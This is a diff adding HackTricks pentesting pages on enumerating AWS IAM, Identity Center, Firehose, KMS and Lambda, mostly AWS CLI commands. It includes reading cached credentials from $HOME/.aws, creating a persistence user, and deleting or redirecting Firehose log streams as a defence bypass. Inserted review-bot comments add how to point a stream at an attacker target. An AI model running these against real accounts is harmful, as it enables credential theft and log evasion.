--open-id-connect-provider-arn + +# Password Policy +aws iam get-account-password-policy + +# MFA +aws iam list-mfa-devices +aws iam list-virtual-mfa-devices +``` + +### Permissions Brute Force + +If you are interested in your own permissions but you don't have access to query IAM you could always brute-force them. + +#### bf-aws-permissions + +The tool [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is just a bash script that will run using the indicated profile all the **`list*`, `describe*`, `get*`** actions it can find using `aws` cli help messages and **return the successful executions**. 
+ +{% code overflow="wrap" %} +```bash +# Bruteforce permissions +bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt +``` +{% endcode %} + +#### bf-aws-perms-simulate + +The tool [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) can find your current permission (or the ones of other principals) if you have the permission **`iam:SimulatePrincipalPolicy`** + +```bash +# Ask for permissions +python3 aws_permissions_checker.py --profile [--arn ] +``` + +#### Perms2ManagedPolicies + +If you found **some permissions your user has**, and you think that they are being granted by a **managed AWS role** (and not by a custom one). You can use the tool [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) to check all the **AWS managed roles that grants the permissions you discovered that you have**. + +{% code overflow="wrap" %} +```bash +# Run example with my profile +python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt +``` +{% endcode %} + +{% hint style="warning" %} +It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example. +{% endhint %} + +#### Cloudtrail2IAM + +[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is a Python tool that analyses **AWS CloudTrail logs to extract and summarize actions** done by everyone or just an specific user or role. The tool will **parse every cloudtrail log from the indicated bucket**. 
+ +{% code overflow="wrap" %} +```bash +git clone https://github.com/carlospolop/Cloudtrail2IAM +cd Cloudtrail2IAM +pip install -r requirements.txt +python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS] +``` +{% endcode %} + +{% hint style="warning" %} +If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who. +{% endhint %} + +#### enumerate-iam + +To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) you first need to download all the API AWS endpoints, from those the script **`generate_bruteforce_tests.py`** will get all the **"list\_", "describe\_", and "get\_" endpoints.** And finally, it will try to **access them** with the given credentials and **indicate if it worked**. + +(In my experience the **tool hangs at some point**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) to try to fix that). + +{% hint style="warning" %} +In my experience this tool is like the previous one but working worse and checking less permissions +{% endhint %} + +{% code overflow="wrap" %} +```bash +# Install tool +git clone git@github.com:andresriancho/enumerate-iam.git +cd enumerate-iam/ +pip install -r requirements.txt + +# Download API endpoints +cd enumerate_iam/ +git clone https://github.com/aws/aws-sdk-js.git +python3 generate_bruteforce_tests.py +rm -rf aws-sdk-js +cd .. + +# Enumerate permissions +python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--session-token SESSION_TOKEN] [--region REGION] +``` +{% endcode %} + +#### weirdAAL + +You could also use the tool [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). 
This tool will check **several common operations on several common services** (will check some enumeration permissions and also some privesc permissions). But it will only check the coded checks (the only way to check more stuff if coding more tests). + +```bash +# Install +git clone https://github.com/carnal0wnage/weirdAAL.git +cd weirdAAL +python3 -m venv weirdAAL +source weirdAAL/bin/activate +pip3 install -r requirements.txt + +# Create a .env file with aws credentials such as +[default] +aws_access_key_id = +aws_secret_access_key = + +# Setup DB +python3 create_dbs.py + +# Invoke it +python3 weirdAAL.py -m ec2_describe_instances -t ec2test # Just some ec2 tests +python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions +# You will see output such as: +# [+] elbv2 Actions allowed are [+] +# ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups'] +``` + +#### Hardening Tools to BF permissions + +{% tabs %} +{% tab title="CloudSploit" %} +{% code overflow="wrap" %} +```bash +# Export env variables +./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json + +# Filter results removing unknown +jq 'map(select(.status | contains("UNKNOWN") | not))' /tmp/out-cloudsploit.json | jq 'map(select(.resource | contains("N/A") | not))' > /tmp/out-cloudsploit-filt.json + +# Get services by regions +jq 'group_by(.region) | map({(.[0].region): ([map((.resource | split(":"))[2]) | unique])})' ~/Desktop/pentests/cere/greybox/core-dev-dev-cloudsploit-filtered.json +``` +{% endcode %} +{% endtab %} + +{% tab title="SteamPipe" %} +```bash +# https://github.com/turbot/steampipe-mod-aws-insights +steampipe check all --export=json + +# https://github.com/turbot/steampipe-mod-aws-perimeter +# In this case you cannot output to JSON, so heck it in the dashboard +steampipe dashboard +``` +{% endtab %} +{% endtabs %} + +#### \ + +Neither of the previous tools is capable of checking close to all permissions, so if you know a better tool 
send a PR! + +### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md" %} +[aws-iam-and-sts-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md) +{% endcontent-ref %} + +### Privilege Escalation + +In the following page you can check how to **abuse IAM permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-iam-privesc.md" %} +[aws-iam-privesc.md](../aws-privilege-escalation/aws-iam-privesc.md) +{% endcontent-ref %} + +### IAM Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-iam-post-exploitation.md" %} +[aws-iam-post-exploitation.md](../aws-post-exploitation/aws-iam-post-exploitation.md) +{% endcontent-ref %} + +### IAM Persistence + +{% content-ref url="../aws-persistence/aws-iam-persistence.md" %} +[aws-iam-persistence.md](../aws-persistence/aws-iam-persistence.md) +{% endcontent-ref %} + +## IAM Identity Center + +You can find a **description of IAM Identity Center** in: + +{% content-ref url="../aws-basic-information/" %} +[aws-basic-information](../aws-basic-information/) +{% endcontent-ref %} + +### Connect via SSO with CLI + +```bash +# Connect with sso via CLI aws configure sso +aws configure sso + +[profile profile_name] +sso_start_url = https://subdomain.awsapps.com/start/ +sso_account_id = +sso_role_name = AdministratorAccess +sso_region = us-east-1 +``` + +### Enumeration + +The main elements of the Identity Center are: + +* Users and groups +* Permission Sets: Have policies attached +* AWS Accounts + +Then, relationships are created so users/groups have Permission Sets over AWS Account. + +{% hint style="info" %} +Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there). 
+{% endhint %} + +```bash +# Check if IAM Identity Center is used +aws sso-admin list-instances + +# Get Permissions sets. These are the policies that can be assigned +aws sso-admin list-permission-sets --instance-arn +aws sso-admin describe-permission-set --instance-arn --permission-set-arn + +## Get managed policies of a permission set +aws sso-admin list-managed-policies-in-permission-set --instance-arn --permission-set-arn +## Get inline policies of a permission set +aws sso-admin get-inline-policy-for-permission-set --instance-arn --permission-set-arn +## Get customer managed policies of a permission set +aws sso-admin list-customer-managed-policy-references-in-permission-set --instance-arn --permission-set-arn +## Get boundaries of a permission set +aws sso-admin get-permissions-boundary-for-permission-set --instance-arn --permission-set-arn + +## List accounts a permission set is affecting +aws sso-admin list-accounts-for-provisioned-permission-set --instance-arn --permission-set-arn +## List principals given a permission set in an account +aws sso-admin list-account-assignments --instance-arn --permission-set-arn --account-id + +# Get permissions sets affecting an account +aws sso-admin list-permission-sets-provisioned-to-account --instance-arn --account-id + +# List users & groups from the identity store +aws identitystore list-users --identity-store-id +aws identitystore list-groups --identity-store-id +## Get members of groups +aws identitystore list-group-memberships --identity-store-id --group-id +## Get memberships or a user or a group +aws identitystore list-group-memberships-for-member --identity-store-id --member-id +``` + +### Local Enumeration + +It's possible to create inside the folder `$HOME/.aws` the file config to configure profiles that are accessible via SSO, for example: + +```ini +[default] +region = us-west-2 +output = json + +[profile my-sso-profile] +sso_start_url = https://my-sso-portal.awsapps.com/start +sso_region = us-west-2 
+sso_account_id = 123456789012 +sso_role_name = MySSORole +region = us-west-2 +output = json + +[profile dependent-profile] +role_arn = arn:aws:iam:::role/ReadOnlyRole +source_profile = Hacktricks-Admin +``` + +This configuration can be used with the commands: + +```bash +# Login in ms-sso-profile +aws sso login --profile my-sso-profile +# Use dependent-profile +aws s3 ls --profile dependent-profile +``` + +When a **profile from SSO is used** to access some information, the credentials are **cached** in a file inside the folder **`$HOME/.aws/sso/cache`**. Therefore they can be **read and used from there**. + +Moreover, **more credentials** can be stored in the folder **`$HOME/.aws/cli/cache`**. This cache directory is primarily used when you are **working with AWS CLI profiles** that use IAM user credentials or **assume** roles through IAM (without SSO). Config example: + +```ini +[profile crossaccountrole] +role_arn = arn:aws:iam::234567890123:role/SomeRole +source_profile = default +mfa_serial = arn:aws:iam::123456789012:mfa/saanvi +external_id = 123456 +``` + +### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md" %} +[aws-identity-center-and-sso-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md) +{% endcontent-ref %} + +### Privilege Escalation + +{% content-ref url="../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md" %} +[aws-sso-and-identitystore-privesc.md](../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md" %} +[aws-sso-and-identitystore-post-exploitation.md](../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md) +{% endcontent-ref %} + +### Persistence + +#### Create a user an assign permissions to it + +{% code overflow="wrap" 
%} +```bash +# Create user identitystore:CreateUser +aws identitystore create-user --identity-store-id --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc +## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password +``` +{% endcode %} + +* Create a group and assign it permissions and set on it a controlled user +* Give extra permissions to a controlled user or group +* By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center. + + However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html). + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md new file mode 100644 index 0000000000..34909d6259 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md @@ -0,0 +1,77 @@ +# AWS - Kinesis Data Firehose Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
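Review bot: in the Local Enumeration example of aws-iam-enum.md, `[profile dependent-profile]` sets `source_profile = Hacktricks-Admin`, a profile that is not defined anywhere in the snippet, so the following `aws s3 ls --profile dependent-profile` would fail; it should read `source_profile = my-sso-profile` to match the `aws sso login --profile my-sso-profile` that precedes it, and `arn:aws:iam:::role/ReadOnlyRole` is missing its account id (a visible placeholder would make that clear). The Perms2ManagedPolicies paragraph speaks of permissions "granted by a managed AWS role" and of "AWS managed roles that grants the permissions", but the tool and the hint below it compare against AWS managed policies, so "role" should be "policy" in both places. Smaller fixes: the stray `#### \` heading before "Neither of the previous tools", "heck it in the dashboard" (check), "Create a user an assign permissions" (and), and "permissions form the Management Account" (from).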
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Kinesis Data Firehose + +Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. + +The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. + +### Enumeration + +```bash +# Get delivery streams +aws firehose list-delivery-streams + +# Get stream info +aws firehose describe-delivery-stream --delivery-stream-name +## Get roles +aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN +``` + +## Post-exploitation / Defense Bypass + +In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly. 
+ +### firehose:DeleteDeliveryStream + +``` +aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete +``` + +### firehose:UpdateDestination + +``` +aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id +``` + +### firehose:PutRecord | firehose:PutRecordBatch + +``` +aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}' + +aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json +``` + +## References + +* [https://docs.amazonaws.cn/en\_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md new file mode 100644 index 0000000000..f1b5c3bdf4 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md @@ -0,0 +1,183 @@ +# AWS - KMS Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
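Review bot: the `firehose:UpdateDestination` example in aws-kinesis-data-firehose-enum.md, `aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id`, changes nothing as written because no new destination is supplied; to redirect or neuter a log stream the call also needs one of `--extended-s3-destination-update`, `--s3-destination-update`, `--http-endpoint-destination-update` or `--splunk-destination-update` pointing at the attacker-controlled target, and the version id and destination id come from `describe-delivery-stream` (`VersionId` and `Destinations[].DestinationId`), which the section should state. The three post-exploitation fences in this file carry no language tag while the Enumeration block is tagged `bash`; tag them the same way for consistency.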
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## KMS - Key Management Service + +AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. + +KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. + +KMS is a **region specific service**. + +**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. + +**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. + +A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. + +There are 2 types of master keys: + +* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. 
+* **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. + +**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. + +### Key Policies + +These defines **who can use and access a key in KMS**. + +By **default:** + +* It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. + + Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. + + * Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. +* It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. + + **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. +* It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. + +**Default policy** example: + +```json +{ + "Sid": "Enable IAM policies", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::111122223333:root" + }, + "Action": "kms:*", + "Resource": "*" +} +``` + +{% hint style="warning" %} +If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. +{% endhint %} + +
+ +Policy Details + +Properties of a policy: + +* JSON based document +* Resource --> Affected resources (can be "\*") +* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) +* Effect --> Allow/Deny +* Principal --> arn affected +* Conditions (optional) --> Condition to give the permissions + +Grants: + +* Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) +* After the grant is created a GrantToken and a GratID are issued + +**Access**: + +* Via **key policy** -- If this exist, this takes **precedent** over the IAM policy +* Via **IAM policy** +* Via **grants** + +
+ +### Key Administrators + +Key administrator by default: + +* Have access to manage KMS but not to encrypt or decrypt data +* Only IAM users and roles can be added to Key Administrators list (not groups) +* If external CMK is used, Key Administrators have the permission to import key material + +### Rotation of CMKs + +* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. +* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. +* **Older keys are retained** to decrypt data that was encrypted prior to the rotation +* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. +* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. + +#### Manual rotation + +* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. +* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. +* You need to **keep old keys to decrypt old files** encrypted with it. + +You can import keys from your on-premises key infrastructure . + +### Other relevant KMS information + +KMS is priced per number of encryption/decryption requests received from all services per month. + +KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. 
+ +With KMS policy you can do the following: + +* Limit who can create data keys and which services have access to use these keys +* Limit systems access to encrypt only, decrypt only or both +* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). + +You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. + +### Enumeration + +```bash +aws kms list-keys +aws kms list-key-policies --key-id +aws kms list-grants --key-id +aws kms describe-key --key-id +aws kms get-key-policy --key-id --policy-name # Default policy name is "default" +aws kms describe-custom-key-stores +``` + +### Privesc + +{% content-ref url="../aws-privilege-escalation/aws-kms-privesc.md" %} +[aws-kms-privesc.md](../aws-privilege-escalation/aws-kms-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %} +[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md) +{% endcontent-ref %} + +### Persistence + +{% content-ref url="../aws-persistence/aws-kms-persistence.md" %} +[aws-kms-persistence.md](../aws-persistence/aws-kms-persistence.md) +{% endcontent-ref %} + +## References + +* [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
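Review bot: the enumeration block leaves the required option values out (`aws kms list-key-policies --key-id`, `aws kms get-key-policy --key-id --policy-name`), so the commands fail as written; add `<key-id>` style placeholders and, since the comment already says the policy name is `default`, write that line out as `aws kms get-key-policy --key-id <key-id> --policy-name default`. The JSON under "Default policy example" is a single statement, not a policy document: either wrap it in `{"Version": "2012-10-17", "Statement": [ ... ]}` or retitle it as the default statement, otherwise a reader who pastes it as a complete key policy gets it rejected. Spelling: "Customer manager CMKs" should be "Customer managed CMKs", "encrypt information as rest" should be "at rest", "opoeration" should be "operation", "GratID" should be "GrantId", and "These defines" should be "These define".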
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md new file mode 100644 index 0000000000..34a5e0cc77 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md @@ -0,0 +1,210 @@ +# AWS - Lambda Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Lambda + +Amazon Web Services (AWS) Lambda is described as a **compute service** that enables the execution of code without the necessity for server provision or management. It is characterized by its ability to **automatically handle resource allocation** needed for code execution, ensuring features like high availability, scalability, and security. A significant aspect of Lambda is its pricing model, where **charges are based solely on the compute time utilized**, eliminating the need for initial investments or long-term obligations. + +To call a lambda it's possible to call it as **frequently as you wants** (with Cloudwatch), **expose** an **URL** endpoint and call it, call it via **API Gateway** or even based on **events** such as **changes** to data in a **S3** bucket or updates to a **DynamoDB** table. + +The **code** of a lambda is stored in **`/var/task`**. + +### Lambda Aliases Weights + +A Lambda can have **several versions**.\ +And it can have **more than 1** version exposed via **aliases**. The **weights** of **each** of the **versions** exposed inside and alias will decide **which alias receive the invocation** (it can be 90%-10% for example).\ +If the code of **one** of the aliases is **vulnerable** you can send **requests until the vulnerable** versions receives the exploit. + +![](<../../../.gitbook/assets/image (223).png>) + +### Resource Policies + +Lambda resource policies allow to **give access to other services/accounts to invoke** the lambda for example.\ +For example this is the policy to allow **anyone to access a lambda exposed via URL**: + +
+ +Or this to allow an API Gateway to invoke it: + +
+ +### Lambda Database Proxies + +When there are **hundreds** of **concurrent lambda requests**, if each of them need to **connect and close a connection to a database**, it's just not going to work (lambdas are stateless, cannot maintain connections open).\ +Then, if your **Lambda functions interact with RDS Proxy instead** of your database instance. It handles the connection pooling necessary for scaling many simultaneous connections created by concurrent Lambda functions. This allows your Lambda applications to **reuse existing connections**, rather than creating new connections for every function invocation. + +### Lambda EFS Filesystems + +To preserve and even share data **Lambdas can access EFS and mount them**, so Lambda will be able to read and write from it. + +### Lambda Layers + +A Lambda _layer_ is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files. + +It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment. + +By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version. + +Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image. 
+ +### Lambda Extensions + +Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. + +* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. +* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. 
+ +### Enumeration + +```bash +aws lambda get-account-settings + +# List functions and get extra config info +aws lambda list-functions +aws lambda get-function --function-name +aws lambda get-function-configuration --function-name +aws lambda list-function-event-invoke-configs --function-name +## Check for creds in env vars +aws lambda list-functions | jq '.Functions[].Environment' +## Download & check the source code +aws lambda get-function --function-name "" --query 'Code.Location' +wget -O lambda-function.zip + +# Get Lambda URL (if any) +aws lambda list-function-url-configs --function-name +aws lambda get-function-url-config --function-name + +# Get who has permissions to invoke the Lambda +aws lambda get-policy --function-name + +# Versions and Aliases +aws lambda list-versions-by-function --function-name +aws lambda list-aliases --function-name + +# List layers +aws lambda list-layers +aws lambda list-layer-versions --layer-name +aws lambda get-layer-version --layer-name --version-number +aws lambda get-layer-version-by-arn --arn #Get external ARNs + +# List other metadata +aws lambda list-event-source-mappings +aws lambda list-code-signing-configs +aws lambda list-functions-by-code-signing-config --code-signing-config-arn +``` + +### Invoke a lambda + +#### Manual + +```bash +# Invoke function +aws lambda invoke --function-name FUNCTION_NAME /tmp/out +## Some functions will expect parameters, they will access them with something like: +## target_policys = event['policy_names'] +## user_name = event['user_name'] +aws lambda invoke --function-name --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess], "user_name": "sdf"}' out.txt +``` + +#### Via exposed URL + +```bash +aws lambda list-function-url-configs --function-name #Get lambda URL +aws lambda get-function-url-config --function-name #Get lambda URL +``` + +#### Call Lambda function via URL + +Now it's time to find out 